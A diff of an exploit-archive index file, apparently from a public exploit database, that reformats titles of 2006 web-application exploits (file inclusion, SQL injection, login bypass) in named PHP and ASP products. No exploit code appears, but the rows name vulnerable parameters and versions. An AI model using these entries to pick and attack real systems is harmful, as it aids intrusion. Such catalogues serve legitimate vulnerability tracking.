2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - 'process.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 -2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 -2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0 +2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - 'templatePath' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0 2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,php,webapps,0 @@ -17593,13 +17594,13 @@ id,file,description,date,author,platform,type,port 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - '/DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 -2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 +2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - 'Encyclopedia' SQL Injection",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,php,webapps,0 2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusions",2006-10-23,GregStar,php,webapps,0 2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 -2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion",2006-10-23,"the master",php,webapps,0 -2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 +2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - 'path' Remote File Inclusion",2006-10-23,"the master",php,webapps,0 +2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - 'chemin_appli' Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - '/include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 @@ -17612,10 +17613,10 @@ id,file,description,date,author,platform,type,port 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - 'publish.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2647,platforms/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,php,webapps,0 -2648,platforms/php/webapps/2648.txt,"CommentIT - (PathToComment) Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 +2648,platforms/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0 -2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 -2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - 'end.php footfile' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 +2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - 'path' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 +2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - 'end.php?footfile' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 @@ -17637,18 +17638,18 @@ id,file,description,date,author,platform,type,port 2677,platforms/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,php,webapps,0 -2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0 +2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion",2006-10-30,K-159,php,webapps,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,php,webapps,0 -2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 +2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - 'pb_lang' Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - '/themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0 -2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 +2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - 'Debug' Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 @@ -17656,16 +17657,16 @@ id,file,description,date,author,platform,type,port 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 -2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution",2006-11-03,Kacper,php,webapps,0 -2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 +2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - PNSV lang Remote Code Execution",2006-11-03,Kacper,php,webapps,0 +2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - 'admin' Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps,0 -2711,platforms/php/webapps/2711.php,"e107 < 0.75 - (e107language_e107cookie) Local File Inclusion",2006-11-04,Kacper,php,webapps,0 -2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion",2006-11-04,Kacper,php,webapps,0 +2711,platforms/php/webapps/2711.php,"e107 < 0.75 - 'e107language_e107cookie' Local File Inclusion",2006-11-04,Kacper,php,webapps,0 +2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - Cookie: PNSVlang Local File Inclusion",2006-11-04,Kacper,php,webapps,0 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 -2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0 -2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0 +2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - 'search_user' SQL Injection",2006-11-04,x23,php,webapps,0 +2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - 'racine' Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 -2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 +2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - Cookie sLanguage Local File Inclusion",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - 'header_simple.php' File Inclusion",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 @@ -17679,7 +17680,7 @@ id,file,description,date,author,platform,type,port 2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - '/admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 -2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 +2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - 'cfgProgDir' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - '/inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 @@ -17694,9 +17695,9 @@ id,file,description,date,author,platform,type,port 2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - 'propertysdetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - 'Products.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - 'CampusNewsDetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 -2758,platforms/php/webapps/2758.php,"PHPWCMS 1.2.6 - (Cookie: wcs_user_lang) Local File Inclusion",2006-11-11,Kacper,php,webapps,0 -2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Blind SQL Injection",2006-11-12,rgod,php,webapps,0 -2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion",2006-11-12,Kacper,php,webapps,0 +2758,platforms/php/webapps/2758.php,"PHPWCMS 1.2.6 - Cookie: wcs_user_lang Local File Inclusion",2006-11-11,Kacper,php,webapps,0 +2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - 'AdminUser' Blind SQL Injection",2006-11-12,rgod,php,webapps,0 +2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - Cookie: lang Local File Inclusion",2006-11-12,Kacper,php,webapps,0 2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - 'switch.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 @@ -17711,16 +17712,16 @@ id,file,description,date,author,platform,type,port 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 -2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 +2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 -2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0 +2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection'",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 -2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 +2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - 'apx_root_path' Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,php,webapps,0 @@ -17732,11 +17733,11 @@ id,file,description,date,author,platform,type,port 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - 'editor.php' Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - 'register.asp' SQL Injection",2006-11-19,ajann,asp,webapps,0 -2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 +2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - 'textFile' Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - 'adminprint.php' Remote File Inclusion",2006-11-21,irvian,php,webapps,0 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 -2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 -2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 +2819,platforms/php/webapps/2819.txt,"LDU 8.x - avatarselect id SQL Injection",2006-11-21,nukedx,php,webapps,0 +2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - avatarselect id SQL Injection",2006-11-21,nukedx,php,webapps,0 2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' SQL Injection",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusions",2006-11-21,3l3ctric-Cracker,php,webapps,0 @@ -17756,7 +17757,7 @@ id,file,description,date,author,platform,type,port 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0 -2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 +2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - Database Backup/Source Disclosure Remote Exploit",2006-11-24,DarkFig,php,webapps,0 2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0 2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - 'edit.asp' SQL Injection",2006-11-25,bolivar,asp,webapps,0 @@ -17781,12 +17782,12 @@ id,file,description,date,author,platform,type,port 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - 'activate.php' File Inclusion",2006-12-03,GregStar,php,webapps,0 -2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 +2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - 'PNSVlang' Remote Code Execution",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - 'categories.php' Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions",2006-12-03,"Cold Zero",php,webapps,0 2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 -2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 +2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - 'link' Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - 'render.php' Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 @@ -17797,7 +17798,7 @@ id,file,description,date,author,platform,type,port 2905,platforms/php/webapps/2905.txt,"Gizzar 03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 -2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) SQL Injection",2006-12-09,ajann,asp,webapps,0 +2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - 'product' SQL Injection",2006-12-09,ajann,asp,webapps,0 2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass",2006-12-09,ajann,asp,webapps,0 2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0 @@ -17826,7 +17827,7 @@ id,file,description,date,author,platform,type,port 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - 'archive.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 -2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 +2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - 'show_file' Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,php,webapps,0 2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps,0 @@ -17858,15 +17859,15 @@ id,file,description,date,author,platform,type,port 2998,platforms/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps,0 2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - '/chat/login.php' Code Execution",2006-12-24,nuffsaid,php,webapps,0 3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 -3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 +3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - 'agent' SQL Injection",2006-12-24,ajann,asp,webapps,0 3002,platforms/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - '/admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 -3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 -3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - 'path' Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 +3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - 'mod_root' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 @@ -17875,16 +17876,16 @@ id,file,description,date,author,platform,type,port 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 -3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 +3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - 'cal_dir' Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - '/bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusions",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 